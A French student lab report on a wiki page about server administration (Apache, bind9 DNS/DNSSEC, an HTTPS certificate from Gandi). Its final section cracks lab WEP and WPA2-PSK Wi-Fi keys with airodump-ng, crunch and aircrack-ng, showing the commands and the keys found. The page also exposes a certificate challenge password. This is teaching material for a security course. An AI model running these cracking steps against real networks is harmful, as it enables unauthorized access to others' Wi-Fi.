==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires le gestionnaire de RAID Logiciel Mdadm ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
